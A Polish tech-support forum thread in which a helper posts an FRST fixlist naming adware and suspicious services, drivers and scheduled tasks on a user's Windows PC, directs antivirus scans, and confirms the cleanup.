    CHR Extension: (电脑管家上网防护) - C:\Users\Woytek\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2016-05-02]
    CHR HKLM\...\Chrome\Extension: [jdiejbegdjikmehflknhkbieocmnogcf] - C:\Users\Woytek\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdiejbegdjikmehflknhkbieocmnogcf.crx [2015-11-07]
    CHR HKLM-x32\...\Chrome\Extension: [ejdabpabkmacjiiooccecnpakonoibah] - C:\Program Files (x86)\DownTangoLauncherToolbar\chrome\DownTangoLauncherToolbar.crx <nie znaleziono>
    CHR HKLM-x32\...\Chrome\Extension: [jdiejbegdjikmehflknhkbieocmnogcf] - C:\Users\Woytek\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdiejbegdjikmehflknhkbieocmnogcf.crx [2015-11-07]
    R2 WpSvc; c:\users\woytek\appdata\roaming\360bizhi\lpi\WpSvc.dll [253352 2016-11-17] ()
    S2 biroguli; C:\Program Files (x86)\cf94849c-fafb-4991-aaa4-42bd333ecba81483574113\knscf94849c-fafb-4991-aaa4-42bd333ecba8.tmpfs [X]
    S2 ef65f95a; "C:\Windows\system32\rundll32.exe" "c:\progra~3\intele~1\IntelewinfilterSvc.dll",service
    S2 GoogleChromeUpService; C:\ProgramData\service.exe /s GoogleChromeUpService /uid:51495 /local:br [X] <==== UWAGA
    S2 GoogleChromeUpSvc; C:\ProgramData\Windows Update\svrupg.exe /s GoogleChromeUpSvc /uid:51495 /local:br [X] <==== UWAGA
    S2 HpSvc; C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll [X] <==== UWAGA
    S2 MaohaWifiSvr; C:\Program Files (x86)\Maoha\MaohaAP\MaohaWifiSvr.exe [X]
    S2 SaFiSvc; C:\Program Files\SaFiPlayer\SaFiSvc.dll [X]
    S2 UCBrowserSvc; "C:\Program Files (x86)\UCBrowser\Application\UCService.exe" [X]
    S2 Winsere; "C:\Program Files (x86)\Winsere\Winsere\Winsere.exe" {79740E79-A383-47A7-B513-3DF6563D007F} {A16B1AF7-982D-40C3-B5C1-633E1A6A6678} [X]
    S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-11-06] ()
    S3 EsgScanner; C:\Windows\SysWOW64\DRIVERS\EsgScanner.sys [19984 2016-11-06] ()
    S3 TSSKX64; C:\Windows\System32\drivers\tsskx64.sys [54904 2016-05-25] (电脑管家)
    R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [23652 ] (UC Web Inc.) <==== UWAGA
    U3 ak8594xo; C:\Windows\System32\Drivers\ak8594xo.sys [0 ] (Microsoft Corporation) <==== UWAGA (zerobajtowy plik/folder)
    S3 athur; system32\DRIVERS\athurx.sys [X]
    S2 ComputerZLock; \??\C:\Program Files (x86)\LuDaShi\ComputerZLock_x64.sys [X] <==== UWAGA
    S3 cpuz139; \??\C:\Users\Woytek\AppData\Local\Temp\cpuz139\cpuz139_x64.sys [X]
    S1 cxvlagnq; \??\C:\Windows\system32\drivers\cxvlagnq.sys [X]
    S1 dfnftzkt; \??\C:\Windows\system32\drivers\dfnftzkt.sys [X]
    S1 dnhdydei; \??\C:\Windows\system32\drivers\dnhdydei.sys [X]
    S3 dtldrvhelp; \??\c:\program files\safiplayer\dtldrvhelp64.sys [X]
    S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
    S1 egpfuutg; \??\C:\Windows\system32\drivers\egpfuutg.sys [X]
    S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
    S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
    S3 gdrv; \??\C:\Windows\gdrv.sys [X]
    S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X]
    S1 MaohaWifiNetPro; \??\C:\Program Files (x86)\Maoha\MaohaAP\MaoHaWiFiNet64.sys [X]
    S1 methovvu; \??\C:\Windows\system32\drivers\methovvu.sys [X]
    S3 NvStreamKms; \??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [X]
    S1 QMUdisk; \??\C:\Program Files (x86)\Tencent\QQPCMgr\11.5.17490.219\QMUdisk64.sys [X]
    S1 snvvcxku; \??\C:\Windows\system32\drivers\snvvcxku.sys [X]
    S3 softaal; \??\C:\Program Files (x86)\Tencent\QQPCMgr\11.5.17490.219\softaal64.sys [X]
    S1 SRepairDrv; \??\C:\Program Files (x86)\Tencent\QQPCMGR\SRepairDrv [X]
    S2 tsnethlpx64; \??\C:\Program Files (x86)\Tencent\QQPCMgr\11.5.17490.219\TsNetHlpX64.sys [X]
    NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ==> Brak pliku
    NETSVCx32: WpSvc -> C:\users\woytek\appdata\roaming\360bizhi\lpi\WpSvc.dll ()
    2017-01-07 13:13 - 2017-01-07 13:14 - 00001853 _____ C:\Users\Public\Desktop\360壁纸.lnk
    2017-01-05 02:14 - 2017-01-05 02:14 - 00000000 ____D C:\Users\Woytek\AppData\Local\AdvinstAnalytics
    2017-01-05 00:53 - 2017-01-07 13:20 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\360bizhi
    2017-01-05 00:53 - 2017-01-07 13:15 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\lockhomepage
    2017-01-05 00:53 - 2017-01-07 13:13 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\360wp
    2017-01-05 00:53 - 2017-01-05 00:53 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\LDSGameAssistant
    2017-01-05 00:52 - 2017-01-07 13:14 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\Ludashi
    2017-01-05 00:52 - 2017-01-05 00:52 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\navplugin
    2017-01-05 00:51 - 2017-01-05 00:52 - 00000000 ____D C:\ProgramData\{8E9CA550-EF1A-4fff-93DD-D053E6E19DFE}.tmp
    2017-01-05 00:48 - 2017-01-07 13:10 - 00000294 _____ C:\Windows\Tasks\UCBrowserUpdaterCore.job
    2017-01-05 00:48 - 2017-01-05 00:48 - 00003434 _____ C:\Windows\System32\Tasks\UCBrowserUpdater
    2017-01-05 00:48 - 2017-01-05 00:48 - 00002924 _____ C:\Windows\System32\Tasks\osTip
    2017-01-05 00:48 - 2017-01-05 00:48 - 00002560 _____ C:\Windows\System32\Tasks\UCBrowserUpdaterCore
    2017-01-05 00:47 - 2017-01-07 13:34 - 00000458 _____ C:\Windows\Tasks\UCBrowserUpdater.job
    2017-01-05 00:46 - 2017-01-05 00:48 - 00000000 __SHD C:\ProgramData\WindowsMsg
    2017-01-05 00:46 - 2017-01-05 00:46 - 00000000 ____D C:\ProgramData\Microleaves
    2017-01-05 00:45 - 2017-01-05 00:45 - 00003476 _____ C:\Windows\System32\Tasks\UCBrowserSecureUpdater
    2017-01-05 00:45 - 2017-01-05 00:45 - 00000000 ____D C:\Users\Woytek\AppData\Local\UCBrowser
    2017-01-05 00:44 - 2017-01-05 01:12 - 00000000 ____D C:\Program Files (x86)\UCBrowser
    2017-01-05 00:43 - 2017-01-05 00:43 - 00000000 __SHD C:\Users\Woytek\AppData\Local\svchost
    2017-01-05 00:43 - 2017-01-05 00:43 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
    2017-01-05 00:43 - 2017-01-05 00:43 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
    2017-01-05 00:42 - 2017-01-05 00:45 - 00000000 ____D C:\Users\Woytek\AppData\Roaming\Microleaves
    2017-01-07 13:10 - 2014-01-20 12:43 - 00001366 _____ C:\Windows\Tasks\FTdownloader V7.0-updater.job
    2017-01-07 13:10 - 2014-01-20 12:43 - 00001308 _____ C:\Windows\Tasks\FTdownloader V7.0-codedownloader.job
    2017-01-07 13:10 - 2014-01-20 12:43 - 00001190 _____ C:\Windows\Tasks\FTdownloader V7.0-enabler.job
    2017-01-07 13:10 - 2014-01-20 12:42 - 00002192 _____ C:\Windows\Tasks\FTdownloader V7.0-firefoxinstaller.job
    2017-01-07 13:10 - 2014-01-20 12:42 - 00002152 _____ C:\Windows\Tasks\FTdownloader V7.0-chromeinstaller-dev.job
    2017-01-07 13:10 - 2013-06-08 10:37 - 00000350 _____ C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_HP_rmv.job
    2017-01-07 13:10 - 2013-05-31 16:44 - 00000350 _____ C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job
    2017-01-07 13:10 - 2012-09-22 17:24 - 00000414 ____H C:\Windows\Tasks\OptimizerPro1UpdaterTask{08EBDEA9-C622-4E1A-88D6-CC82F934351B}.job
    2017-01-05 02:31 - 2015-08-07 23:56 - 00000000 ____D C:\AdwCleaner
    2017-01-02 21:54 - 2016-10-02 14:41 - 00000388 _____ C:\Windows\Tasks\Driver Easy Scheduled Scan.job
    2016-04-26 13:24 - 2016-04-26 13:24 - 0000009 ____N () C:\ProgramData\a.bat
    2010-08-28 21:43 - 2010-08-28 21:43 - 0577335 ____N () C:\ProgramData\adb.exe
    2010-08-28 21:43 - 2010-08-28 21:43 - 0096256 ____N (Google, inc) C:\ProgramData\AdbWinApi.dll
    2010-08-28 21:43 - 2010-08-28 21:43 - 0060928 ____N (Google, inc) C:\ProgramData\AdbWinUsbApi.dll
    2015-02-12 12:40 - 2016-01-25 13:18 - 0000000 _____ () C:\ProgramData\dat.bmp
    2012-11-06 23:12 - 2012-11-06 23:12 - 83023306 ____T () C:\ProgramData\dsgsdgdsgdsgw.pad
    2010-08-28 21:43 - 2010-08-28 21:43 - 0356009 ____N () C:\ProgramData\fastboot.exe
    2012-11-06 23:12 - 2012-11-06 23:12 - 0044544 _____ (Microsoft Corporation) C:\ProgramData\lsass.exe
    2016-05-02 14:23 - 2016-05-02 14:23 - 0002303 _____ () C:\ProgramData\webad.xml
    2015-02-11 19:23 - 2015-02-11 19:23 - 0332800 _____ () C:\ProgramData\wget.exe
    2016-05-02 14:24 - 2016-05-02 14:24 - 0413439 _____ () C:\ProgramData\xdo.zip
    EmptyTemp:

    W FRST wybierz Napraw.

    Plik Fixlist.txt zapisz z kodowaniem utf.

    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    oraz http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • CControls
  • #4 07 Sty 2017 23:13
    Kolobos
    Spec od komputerów

    Miales wykonac Fixlist w trybie awaryjnym, a nie w normalnym. Przez to infekcja nie zostala usunieta.

    Uruchom system w trybie awaryjnym i tam wykonaj Fixlist.txt:
    CloseProcesses:
    R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [23652 ] (UC Web Inc.) <==== UWAGA
    U3 a44tkft5; C:\Windows\System32\Drivers\a44tkft5.sys [0 ] (Microsoft Corporation) <==== UWAGA (zerobajtowy plik/folder)
    2017-01-05 00:44 - 2017-01-05 01:12 - 00000000 ____D C:\Program Files (x86)\UCBrowser

    Po wykonaniu zamiesc nowe logi ze skanowania.

    0
  • Pomocny post
    #6 08 Sty 2017 21:00
    Kolobos
    Spec od komputerów

    Usun katalog C:\FRST i to wszystko.

    0
  • #7 09 Sty 2017 12:26
    Cracc
    Poziom 2  

    Dzięki bardzo za pomoc ;)

    0